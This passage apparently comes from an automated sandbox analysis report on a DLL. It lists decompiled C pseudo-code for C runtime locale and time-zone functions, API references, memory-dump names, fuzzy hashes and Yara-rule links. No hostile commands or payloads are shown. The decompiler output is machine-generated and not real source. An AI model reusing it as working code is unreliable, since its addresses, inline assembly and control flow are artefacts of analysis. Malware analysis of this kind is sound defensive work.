						_t84 = _t83 + 1;
						 *0x6d53fb40 = _t84;
						 *0x6d53fb54 = _t84;
					}
					_v16 = 0;
					E6D476A77( &_v36);
					_t100 =  *0x6d53fb54; // 0x2
				}
				_t88 =  *((intOrPtr*)( *((intOrPtr*)(_t85 + 8)) + 4));
				if(_t100 >=  *((intOrPtr*)(_t88 + 0xc))) {
					_t104 = 0;
					__eflags = 0;
					L8:
					if( *((char*)(_t88 + 0x14)) == 0) {
						L11:
						if(_t104 != 0) {
							L21:
							_v16 = 0xffffffff;
							E6D476A77( &_v44);
							 *[fs:0x0] = _v24;
							return _t104;
						}
						L12:
						_t61 = _v40;
						if(_t61 == 0) {
							_push(0x44);
							_t104 = E6D4906EF(_t88, _t98, _t104, __eflags);
							_v40 = _t104;
							_v16 = 2;
							_t92 =  *((intOrPtr*)( *((intOrPtr*)(_t85 + 8)) + 4));
							__eflags = _t92;
							if(_t92 != 0) {
								_t64 =  *((intOrPtr*)(_t92 + 0x18));
								__eflags = _t64;
								if(_t64 == 0) {
									_t64 = _t92 + 0x1c;
								}
							} else {
								_t64 = 0x6d50f4bd;
							}
							L6D4519A0(_t85,  &_v160, _t98, _t100, _t130, _t64); // executed
							_v16 = 3;
							_v32 = 1;
							 *_t104 = 0x6d500310;
							_v16 = 4;
							_t34 = _t104 + 4; // 0x4
							 *_t104 = 0x6d500320;
							 *_t34 = 0;
							_v16 = 5;
							 *_t104 = 0x6d50034c;
							_v16 = 6;
							 *_t104 = 0x6d500a80;
							E6D47A48E( &_v160, _t34, __eflags,  &_v60);
							asm("movups xmm0, [eax]");
							asm("movups [esi+0x8], xmm0");
							_t69 = E6D47A6A8(__eflags,  &_v108);
							asm("movups xmm0, [eax]");
							asm("movups [esi+0x18], xmm0");
							asm("movups xmm0, [eax+0x10]");
							asm("movups [esi+0x28], xmm0");
							asm("movq xmm0, [eax+0x20]");
							asm("movq [esi+0x38], xmm0");
							 *((intOrPtr*)(_t104 + 0x40)) =  *((intOrPtr*)(_t69 + 0x28));
							_v16 = 0;
							_v32 = 1;
							_v32 = 0;
							E6D451A70();
							_v40 = _t104;
							_v16 = 8;
							E6D478A0B(__eflags, _t104);
							_t76 =  *((intOrPtr*)( *_t104 + 4));
							__eflags = _t76 - 0x6d451d80;
							if(_t76 != 0x6d451d80) {
								 *_t76();
							} else {
								asm("lock inc dword [edi]");
							}
							 *0x6d55a9e8 = _t104;
							_v40 = 0;
							_v16 = 0;
						} else {
							_t104 = _t61;
						}
						goto L21;
					}
					_t78 = E6D478A37();
					if(_t100 >=  *((intOrPtr*)(_t78 + 0xc))) {
						goto L12;
					}
					_t104 =  *((intOrPtr*)( *((intOrPtr*)(_t78 + 8)) + _t100 * 4));
					goto L11;
				}
				_t104 =  *((intOrPtr*)( *((intOrPtr*)(_t88 + 8)) + _t100 * 4));
				if(_t104 != 0) {
					goto L21;
				}
				goto L8;
			}

0x6d45d4d0
0x6d45d4d0
0x6d45d4d1
0x6d45d4e0
0x6d45d4e6
0x6d45d4e8
0x6d45d4f3
0x6d45d4f4
0x6d45d4fd
0x6d45d504
0x6d45d508
0x6d45d513
0x6d45d51a
0x6d45d51f
0x6d45d526
0x6d45d531
0x6d45d536
0x6d45d53c
0x6d45d541
0x6d45d545
0x6d45d54b
0x6d45d54d
0x6d45d552
0x6d45d553
0x6d45d558
0x6d45d558
0x6d45d55d
0x6d45d564
0x6d45d569
0x6d45d569
0x6d45d572
0x6d45d578
0x6d45d58a
0x6d45d58a
0x6d45d58c
0x6d45d590
0x6d45d5a2
0x6d45d5a4
0x6d45d6c1
0x6d45d6c1
0x6d45d6cb
0x6d45d6d5
0x6d45d6e5
0x6d45d6e5
0x6d45d5aa
0x6d45d5aa
0x6d45d5af
0x6d45d5b8
0x6d45d5bf
0x6d45d5c4
0x6d45d5c7
0x6d45d5ce
0x6d45d5d1
0x6d45d5d3
0x6d45d5dc
0x6d45d5df
0x6d45d5e1
0x6d45d5e3
0x6d45d5e3
0x6d45d5d5
0x6d45d5d5
0x6d45d5d5
0x6d45d5ed
0x6d45d5f2
0x6d45d5f6
0x6d45d5fd
0x6d45d603
0x6d45d60a
0x6d45d60d
0x6d45d613
0x6d45d619
0x6d45d620
0x6d45d626
0x6d45d631
0x6d45d637
0x6d45d63f
0x6d45d646
0x6d45d64a
0x6d45d652
0x6d45d655
0x6d45d659
0x6d45d65d
0x6d45d661
0x6d45d666
0x6d45d66e
0x6d45d671
0x6d45d67d
0x6d45d689
0x6d45d68c
0x6d45d691
0x6d45d694
0x6d45d699
0x6d45d6a3
0x6d45d6a6
0x6d45d6ab
0x6d45d6e8
0x6d45d6ad
0x6d45d6ad
0x6d45d6ad
0x6d45d6b0
0x6d45d6b6
0x6d45d6bd
0x6d45d5b1
0x6d45d5b1
0x6d45d5b1
0x00000000
0x6d45d5af
0x6d45d592
0x6d45d59a
0x00000000
0x00000000
0x6d45d59f
0x00000000
0x6d45d59f
0x6d45d57d
0x6d45d582
0x00000000
0x00000000
0x00000000

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D45D51A
std::_Lockit::_Lockit.LIBCPMT ref: 6D45D53C
std::_Lockit::~_Lockit.LIBCPMT ref: 6D45D564
__Getctype.LIBCPMT ref: 6D45D637
__Getcvt.LIBCPMT ref: 6D45D64A
std::_Facet_Register.LIBCPMT ref: 6D45D699
std::_Lockit::~_Lockit.LIBCPMT ref: 6D45D6CB

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeGetcvtRegister
String ID:
API String ID: 2755674607-0
Opcode ID: f907c71a5f6f891e62809ce0e2c466122e4e6a3629d24070b622dfe64d3783ee
Instruction ID: a100f476a4c54f8b0fcac8d096b88879bd018381eadd1e7d6761b0b67e9272a5
Opcode Fuzzy Hash: f907c71a5f6f891e62809ce0e2c466122e4e6a3629d24070b622dfe64d3783ee
Instruction Fuzzy Hash: 7961CBB0D04209CFDB21CF58C540BAEBBB4BF45318F25815DD84AAB391E774AE55CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6D4D8410, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 1158sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000000C5), ref: 6D4D9129

Strings

O, xrefs: 6D4D8E46
}, xrefs: 6D4D88E5
P}Rm, xrefs: 6D4D8D13

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: Sleep
String ID: O$P}Rm$}
API String ID: 3472027048-1576422739
Opcode ID: 99ff78dde2168f124fb9784a8f95009a81636f4021a95c7b75f68ce570c2e5e3
Instruction ID: 246d44404dbd3a3072566b84ac432e1fadfed1f199b938aa3778e894fbdf5a3d
Opcode Fuzzy Hash: 99ff78dde2168f124fb9784a8f95009a81636f4021a95c7b75f68ce570c2e5e3
Instruction Fuzzy Hash: 0DA293756083918FCB18CF2CD5A466ABBF2BB8A304F064A2EE485C7B45E735D905CB85

Uniqueness

Uniqueness Score: -1.00%

Function 6D4799C1, Relevance: 3.0, APIs: 2, Instructions: 28COMMON

Download Yara Rule

APIs

std::ios_base::_Init.LIBCPMT ref: 6D4799C7

Part of subcall function 6D477A37: __EH_prolog3.LIBCMT ref: 6D477A3E
Part of subcall function 6D477A37: std::locale::_Init.LIBCPMT ref: 6D477A87

Part of subcall function 6D47A01A: __EH_prolog3.LIBCMT ref: 6D47A021

std::ios_base::_Addstd.LIBCPMT ref: 6D479A00

Part of subcall function 6D453D60: __CxxThrowException@8.LIBVCRUNTIME ref: 6D453D8D
Part of subcall function 6D453D60: __CxxThrowException@8.LIBVCRUNTIME ref: 6D453DD2

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: Exception@8H_prolog3InitThrowstd::ios_base::_$Addstdstd::locale::_
String ID:
API String ID: 745713136-0
Opcode ID: 0dd537f08f494ba3ec3a9555e3577bc4c528193570e35c7b71883187b970f533
Instruction ID: 0d84421d7c482552fb2f62d5840f1e2152aef346934949fcb0910d46d38f6905
Opcode Fuzzy Hash: 0dd537f08f494ba3ec3a9555e3577bc4c528193570e35c7b71883187b970f533
Instruction Fuzzy Hash: 6DF03031A08794A7E730DE65D488F9AB7A4AF00768F50581EE68647A80D7B6F94087D0

Uniqueness

Uniqueness Score: -1.00%

Function 6D4773C0, Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6D4773C7
std::locale::_Init.LIBCPMT ref: 6D4773E8

Part of subcall function 6D478A3D: __EH_prolog3.LIBCMT ref: 6D478A44
Part of subcall function 6D478A3D: std::_Lockit::_Lockit.LIBCPMT ref: 6D478A4F
Part of subcall function 6D478A3D: std::locale::_Setgloballocale.LIBCPMT ref: 6D478A6A
Part of subcall function 6D478A3D: _Yarn.LIBCPMT ref: 6D478A80
Part of subcall function 6D478A3D: std::_Lockit::~_Lockit.LIBCPMT ref: 6D478AC0

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog3Lockitstd::_std::locale::_$InitLockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 3152668004-0
Opcode ID: bb1755bd667dabeda3f0ffc4b76487a112cf16b0911ac9e9dc30124a62cdd50d
Instruction ID: 0ea63edf627e76353725df574c67782d1d9c5ad45ce826082993449d712a0eb9
Opcode Fuzzy Hash: bb1755bd667dabeda3f0ffc4b76487a112cf16b0911ac9e9dc30124a62cdd50d
Instruction Fuzzy Hash: A7E0DF32E0D622CBD3309B6A8001FACAB81AB40B94FA2001ED7009F680CBB44C4087D2

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C1817, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000001,6D4D78BB,?,6D491D91,6D4D78BD,6D4D78BB,00000000,00000000,?,6D45140C,6D4D78BF,6D4D78BF), ref: 6D4C1849

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ec90dab817167e4ffc0c4353d75ea06dc44d2812d9c2673008915169a8a0e958
Instruction ID: 117b108be9fa5e3182b57edbb5a5b7fd3096c2c2956a5c5bb44f75ab543242d7
Opcode Fuzzy Hash: ec90dab817167e4ffc0c4353d75ea06dc44d2812d9c2673008915169a8a0e958
Instruction Fuzzy Hash: CCE0EC2914C112D7FB3117AA4C04FA7365CDF023A0F224129DD98D55C0DF20CC0041F3

Uniqueness

Uniqueness Score: -1.00%

Function 6D47A01A, Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6D47A021

Part of subcall function 6D45D4D0: std::_Lockit::_Lockit.LIBCPMT ref: 6D45D51A
Part of subcall function 6D45D4D0: std::_Lockit::_Lockit.LIBCPMT ref: 6D45D53C
Part of subcall function 6D45D4D0: std::_Lockit::~_Lockit.LIBCPMT ref: 6D45D564
Part of subcall function 6D45D4D0: std::_Lockit::~_Lockit.LIBCPMT ref: 6D45D6CB

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
String ID:
API String ID: 1383202999-0
Opcode ID: 7c40e540151ef3179e21d76331717310ce2752b78a097a671217b2120be3fcf5
Instruction ID: a3d9a90b582602c7cd380eb8f28e6913978b7a628bb88d39572c01337dc15f6f
Opcode Fuzzy Hash: 7c40e540151ef3179e21d76331717310ce2752b78a097a671217b2120be3fcf5
Instruction Fuzzy Hash: C5F030769041199BDF04DB61C440DAD7721FF90259F61005DDA026B284DF305F12CBE6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6D4C8870, Relevance: 10.9, APIs: 7, Instructions: 370
timeCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E6D4C8870(void* __ebx, void* __edi, signed int __esi, void* __eflags, void* __fp0, signed int _a4) {
				signed int _v8;
				signed int _v12;
				int _v16;
				int _v20;
				int _v24;
				char _v52;
				int _v56;
				int _v60;
				signed int _v100;
				char _v272;
				intOrPtr _v276;
				char _v280;
				char _v356;
				char _v360;
				void* __ebp;
				signed int _t65;
				signed int _t72;
				signed int _t74;
				signed int _t78;
				signed int _t85;
				signed int _t89;
				signed int _t91;
				long _t93;
				signed int* _t96;
				signed int _t99;
				signed int _t102;
				signed int _t106;
				void* _t113;
				signed int _t116;
				void* _t117;
				void* _t119;
				void* _t120;
				void* _t122;
				signed int _t124;
				signed int _t125;
				signed int* _t128;
				signed int _t129;
				void* _t132;
				void* _t134;
				signed int _t135;
				signed int _t137;
				void* _t140;
				intOrPtr _t141;
				void* _t143;
				signed int _t150;
				signed int _t151;
				signed int _t154;
				signed int _t158;
				signed int _t161;
				intOrPtr* _t166;
				signed int _t167;
				intOrPtr* _t168;
				void* _t169;
				intOrPtr _t170;
				void* _t171;
				signed int _t172;
				int _t176;
				signed int _t178;
				char** _t179;
				signed int _t183;
				signed int _t184;
				void* _t191;
				signed int _t192;
				void* _t193;
				signed int _t194;
				void* _t221;

				_t221 = __fp0;
				_t178 = __esi;
				_t171 = __edi;
				_t65 = E6D4C831F();
				_v8 = _v8 & 0x00000000;
				_t137 = _t65;
				_v16 = _v16 & 0x00000000;
				_v12 = _t137;
				if(E6D4C837D( &_v8) != 0 || E6D4C8325( &_v16) != 0) {
					L46:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E6D4B40F5();
					asm("int3");
					_t191 = _t193;
					_t194 = _t193 - 0x10;
					_push(_t137);
					_t179 = E6D4C831F();
					_v52 = 0;
					_v56 = 0;
					_v60 = 0;
					_t72 = E6D4C837D( &_v52);
					_t143 = _t178;
					__eflags = _t72;
					if(_t72 != 0) {
						L66:
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						E6D4B40F5();
						asm("int3");
						_push(_t191);
						_t192 = _t194;
						_t74 =  *0x6d534074; // 0x97f0af70
						_v100 = _t74 ^ _t192;
						 *0x6d534494 =  *0x6d534494 | 0xffffffff;
						 *0x6d534488 =  *0x6d534488 | 0xffffffff;
						_push(0);
						_push(_t179);
						_push(_t171);
						_t172 = 0;
						 *0x6d540a58 = 0;
						_t78 = E6D4D2636(0x6d508120, 0, _t179, __eflags, _t221,  &_v360,  &_v356, 0x100, 0x6d508120);
						__eflags = _t78;
						if(_t78 != 0) {
							__eflags = _t78 - 0x22;
							if(_t78 == 0x22) {
								_t184 = E6D4C1817(_t143, _v276);
								__eflags = _t184;
								if(__eflags != 0) {
									_t85 = E6D4D2636(0x6d508120, 0, _t184, __eflags, _t221,  &_v280, _t184, _v276, 0x6d508120);
									__eflags = _t85;
									if(_t85 == 0) {
										E6D4C02CE(0);
										_t172 = _t184;
									} else {
										_push(_t184);
										goto L73;
									}
								} else {
									_push(0);
									L73:
									E6D4C02CE();
								}
							}
						} else {
							_t172 =  &_v272;
						}
						asm("sbb esi, esi");
						_t183 =  ~(_t172 -  &_v272) & _t172;
						__eflags = _t172;
						if(_t172 == 0) {
							L81:
							L47();
						} else {
							__eflags =  *_t172;
							if(__eflags == 0) {
								goto L81;
							} else {
								_push(_t172);
								E6D4C8870(0x6d508120, _t172, _t183, __eflags, _t221);
							}
						}
						E6D4C02CE(_t183);
						__eflags = _v16 ^ _t192;
						return E6D4903E3(_v16 ^ _t192);
					} else {
						_t89 = E6D4C8325( &_v16);
						_pop(_t143);
						__eflags = _t89;
						if(_t89 != 0) {
							goto L66;
						} else {
							_t91 = E6D4C8351( &_v20);
							_pop(_t143);
							__eflags = _t91;
							if(_t91 != 0) {
								goto L66;
							} else {
								E6D4C02CE( *0x6d540a50);
								 *0x6d540a50 = 0;
								 *_t194 = 0x6d540a60;
								_t93 = GetTimeZoneInformation(??);
								__eflags = _t93 - 0xffffffff;
								if(_t93 != 0xffffffff) {
									_t150 =  *0x6d540a60 * 0x3c;
									_t167 =  *0x6d540ab4; // 0x0
									_push(_t171);
									 *0x6d540a58 = 1;
									_v12 = _t150;
									__eflags =  *0x6d540aa6; // 0x0
									if(__eflags != 0) {
										_t151 = _t150 + _t167 * 0x3c;
										__eflags = _t151;
										_v12 = _t151;
									}
									__eflags =  *0x6d540afa; // 0x0
									if(__eflags == 0) {
										L56:
										_v16 = 0;
										_v20 = 0;
									} else {
										_t106 =  *0x6d540b08; // 0x0
										__eflags = _t106;
										if(_t106 == 0) {
											goto L56;
										} else {
											_v16 = 1;
											_v20 = (_t106 - _t167) * 0x3c;
										}
									}
									_t176 = E6D4B4298(0, _t167, _t221);
									_t99 = WideCharToMultiByte(_t176, 0, 0x6d540a64, 0xffffffff,  *_t179, 0x3f, 0,  &_v24);
									__eflags = _t99;
									if(_t99 == 0) {
										L60:
										 *( *_t179) = 0;
									} else {
										__eflags = _v24;
										if(_v24 != 0) {
											goto L60;
										} else {
											( *_t179)[0x3f] = 0;
										}
									}
									_t102 = WideCharToMultiByte(_t176, 0, 0x6d540ab8, 0xffffffff, _t179[1], 0x3f, 0,  &_v24);
									__eflags = _t102;
									if(_t102 == 0) {
										L64:
										 *(_t179[1]) = 0;
									} else {
										__eflags = _v24;
										if(_v24 != 0) {
											goto L64;
										} else {
											_t179[1][0x3f] = 0;
										}
									}
								}
								 *(E6D4C8319()) = _v12;
								 *((intOrPtr*)(E6D4C830D())) = _v16;
								_t96 = E6D4C8313();
								 *_t96 = _v20;
								return _t96;
							}
						}
					}
				} else {
					_t168 =  *0x6d540a50; // 0x0
					_t178 = _a4;
					if(_t168 == 0) {
						L12:
						E6D4C02CE(_t168);
						_t154 = _t178;
						_t12 = _t154 + 1; // 0x6d4c8c61
						_t169 = _t12;
						do {
							_t113 =  *_t154;
							_t154 = _t154 + 1;
						} while (_t113 != 0);
						_t13 = _t154 - _t169 + 1; // 0x6d4c8c62
						 *0x6d540a50 = E6D4C1817(_t154 - _t169, _t13);
						_t116 = E6D4C02CE(0);
						_t170 =  *0x6d540a50; // 0x0
						if(_t170 == 0) {
							goto L45;
						} else {
							_t158 = _t178;
							_push(_t171);
							_t14 = _t158 + 1; // 0x6d4c8c61
							_t171 = _t14;
							do {
								_t117 =  *_t158;
								_t158 = _t158 + 1;
							} while (_t117 != 0);
							_t15 = _t158 - _t171 + 1; // 0x6d4c8c62
							_t119 = E6D4BC262(_t170, _t15, _t178);
							_t193 = _t193 + 0xc;
							if(_t119 == 0) {
								_t171 = 3;
								_push(_t171);
								_t120 = E6D4D19CF(_t159,  *_t137, 0x40, _t178);
								_t193 = _t193 + 0x10;
								if(_t120 == 0) {
									while( *_t178 != 0) {
										_t178 = _t178 + 1;
										_t171 = _t171 - 1;
										if(_t171 != 0) {
											continue;
										}
										break;
									}
									_pop(_t171);
									_t137 = _t137 & 0xffffff00 |  *_t178 == 0x0000002d;
									if(_t137 != 0) {
										_t178 = _t178 + 1;
									}
									_t161 = E6D4BD6B5(_t159, _t221, _t178) * 0xe10;
									_v8 = _t161;
									while(1) {
										_t122 =  *_t178;
										if(_t122 != 0x2b && (_t122 < 0x30 || _t122 > 0x39)) {
											break;
										}
										_t178 = _t178 + 1;
									}
									__eflags =  *_t178 - 0x3a;
									if( *_t178 == 0x3a) {
										_t178 = _t178 + 1;
										_t161 = _v8 + E6D4BD6B5(_t161, _t221, _t178) * 0x3c;
										_v8 = _t161;
										while(1) {
											_t132 =  *_t178;
											__eflags = _t132 - 0x30;
											if(_t132 < 0x30) {
												break;
											}
											__eflags = _t132 - 0x39;
											if(_t132 <= 0x39) {
												_t178 = _t178 + 1;
												__eflags = _t178;
												continue;
											}
											break;
										}
										__eflags =  *_t178 - 0x3a;
										if( *_t178 == 0x3a) {
											_t178 = _t178 + 1;
											_t161 = _v8 + E6D4BD6B5(_t161, _t221, _t178);
											_v8 = _t161;
											while(1) {
												_t134 =  *_t178;
												__eflags = _t134 - 0x30;
												if(_t134 < 0x30) {
													goto L38;
												}
												__eflags = _t134 - 0x39;
												if(_t134 <= 0x39) {
													_t178 = _t178 + 1;
													__eflags = _t178;
													continue;
												}
												goto L38;
											}
										}
									}
									L38:
									__eflags = _t137;
									if(_t137 != 0) {
										_v8 = _t161;
									}
									__eflags =  *_t178;
									_t124 = 0 |  *_t178 != 0x00000000;
									_v16 = _t124;
									__eflags = _t124;
									_t125 = _v12;
									if(_t124 == 0) {
										_t29 = _t125 + 4; // 0xfffffddd
										 *((char*)( *_t29)) = 0;
										L44:
										 *(E6D4C8319()) = _v8;
										_t128 = E6D4C830D();
										 *_t128 = _v16;
										return _t128;
									}
									_push(3);
									_t28 = _t125 + 4; // 0xfffffddd
									_t129 = E6D4D19CF(_t161,  *_t28, 0x40, _t178);
									_t193 = _t193 + 0x10;
									__eflags = _t129;
									if(_t129 == 0) {
										goto L44;
									}
								}
							}
							goto L46;
						}
					} else {
						_t166 = _t168;
						_t135 = _t178;
						while(1) {
							_t140 =  *_t135;
							if(_t140 !=  *_t166) {
								break;
							}
							if(_t140 == 0) {
								L8:
								_t116 = 0;
							} else {
								_t9 = _t135 + 1; // 0xdde805eb
								_t141 =  *_t9;
								if(_t141 !=  *((intOrPtr*)(_t166 + 1))) {
									break;
								} else {
									_t135 = _t135 + 2;
									_t166 = _t166 + 2;
									if(_t141 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							if(_t116 == 0) {
								L45:
								return _t116;
							} else {
								_t137 = _v12;
								goto L12;
							}
							goto L83;
						}
						asm("sbb eax, eax");
						_t116 = _t135 | 0x00000001;
						__eflags = _t116;
						goto L10;
					}
				}
				L83:
			}

0x6d4c8870
0x6d4c8870
0x6d4c8870
0x6d4c887a
0x6d4c887f
0x6d4c8883
0x6d4c8885
0x6d4c888d
0x6d4c8898
0x6d4c8a38
0x6d4c8a3a
0x6d4c8a3b
0x6d4c8a3c
0x6d4c8a3d
0x6d4c8a3e
0x6d4c8a3f
0x6d4c8a44
0x6d4c8a48
0x6d4c8a4a
0x6d4c8a4d
0x6d4c8a54
0x6d4c8a5b
0x6d4c8a5f
0x6d4c8a62
0x6d4c8a65
0x6d4c8a6a
0x6d4c8a6b
0x6d4c8a6d
0x6d4c8b95
0x6d4c8b95
0x6d4c8b96
0x6d4c8b97
0x6d4c8b98
0x6d4c8b99
0x6d4c8b9a
0x6d4c8b9f
0x6d4c8ba2
0x6d4c8ba3
0x6d4c8bab
0x6d4c8bb2
0x6d4c8bb5
0x6d4c8bc2
0x6d4c8bc9
0x6d4c8bca
0x6d4c8bcb
0x6d4c8bd1
0x6d4c8be0
0x6d4c8be7
0x6d4c8bef
0x6d4c8bf1
0x6d4c8bfb
0x6d4c8bfe
0x6d4c8c0b
0x6d4c8c0e
0x6d4c8c10
0x6d4c8c29
0x6d4c8c31
0x6d4c8c33
0x6d4c8c39
0x6d4c8c3e
0x6d4c8c35
0x6d4c8c35
0x00000000
0x6d4c8c35
0x6d4c8c12
0x6d4c8c12
0x6d4c8c13
0x6d4c8c13
0x6d4c8c13
0x6d4c8c40
0x6d4c8bf3
0x6d4c8bf3
0x6d4c8bf3
0x6d4c8c4d
0x6d4c8c4f
0x6d4c8c51
0x6d4c8c53
0x6d4c8c63
0x6d4c8c63
0x6d4c8c55
0x6d4c8c55
0x6d4c8c58
0x00000000
0x6d4c8c5a
0x6d4c8c5a
0x6d4c8c5b
0x6d4c8c60
0x6d4c8c58
0x6d4c8c69
0x6d4c8c74
0x6d4c8c7f
0x6d4c8a73
0x6d4c8a77
0x6d4c8a7c
0x6d4c8a7d
0x6d4c8a7f
0x00000000
0x6d4c8a85
0x6d4c8a89
0x6d4c8a8e
0x6d4c8a8f
0x6d4c8a91
0x00000000
0x6d4c8a97
0x6d4c8a9d
0x6d4c8aa2
0x6d4c8aa8
0x6d4c8aaf
0x6d4c8ab5
0x6d4c8ab8
0x6d4c8abe
0x6d4c8ac5
0x6d4c8acb
0x6d4c8acf
0x6d4c8ad5
0x6d4c8ad8
0x6d4c8adf
0x6d4c8ae4
0x6d4c8ae4
0x6d4c8ae6
0x6d4c8ae6
0x6d4c8ae9
0x6d4c8af0
0x6d4c8b08
0x6d4c8b08
0x6d4c8b0b
0x6d4c8af2
0x6d4c8af2
0x6d4c8af7
0x6d4c8af9
0x00000000
0x6d4c8afb
0x6d4c8afd
0x6d4c8b03
0x6d4c8b03
0x6d4c8af9
0x6d4c8b13
0x6d4c8b27
0x6d4c8b2d
0x6d4c8b2f
0x6d4c8b3d
0x6d4c8b3f
0x6d4c8b31
0x6d4c8b31
0x6d4c8b34
0x00000000
0x6d4c8b36
0x6d4c8b38
0x6d4c8b38
0x6d4c8b34
0x6d4c8b54
0x6d4c8b5b
0x6d4c8b5d
0x6d4c8b6c
0x6d4c8b6f
0x6d4c8b5f
0x6d4c8b5f
0x6d4c8b62
0x00000000
0x6d4c8b64
0x6d4c8b67
0x6d4c8b67
0x6d4c8b62
0x6d4c8b5d
0x6d4c8b79
0x6d4c8b83
0x6d4c8b88
0x6d4c8b8d
0x6d4c8b94
0x6d4c8b94
0x6d4c8a91
0x6d4c8a7f
0x6d4c88b0
0x6d4c88b0
0x6d4c88b6
0x6d4c88bb
0x6d4c88f1
0x6d4c88f2
0x6d4c88f8
0x6d4c88fa
0x6d4c88fa
0x6d4c88fd
0x6d4c88fd
0x6d4c88ff
0x6d4c8900
0x6d4c8906
0x6d4c8911
0x6d4c8916
0x6d4c891b
0x6d4c8925
0x00000000
0x6d4c892b
0x6d4c892b
0x6d4c892d
0x6d4c892e
0x6d4c892e
0x6d4c8931
0x6d4c8931
0x6d4c8933
0x6d4c8934
0x6d4c893b
0x6d4c8940
0x6d4c8945
0x6d4c894a
0x6d4c8952
0x6d4c8953
0x6d4c8959
0x6d4c895e
0x6d4c8963
0x6d4c8969
0x6d4c896e
0x6d4c896f
0x6d4c8972
0x00000000
0x00000000
0x00000000
0x6d4c8972
0x6d4c8977
0x6d4c8978
0x6d4c897d
0x6d4c897f
0x6d4c897f
0x6d4c8987
0x6d4c898d
0x6d4c8990
0x6d4c8990
0x6d4c8994
0x00000000
0x00000000
0x6d4c899e
0x6d4c899e
0x6d4c89a1
0x6d4c89a4
0x6d4c89a6
0x6d4c89b4
0x6d4c89b6
0x6d4c89c0
0x6d4c89c0
0x6d4c89c2
0x6d4c89c4
0x00000000
0x00000000
0x6d4c89bb
0x6d4c89bd
0x6d4c89bf
0x6d4c89bf
0x00000000
0x6d4c89bf
0x00000000
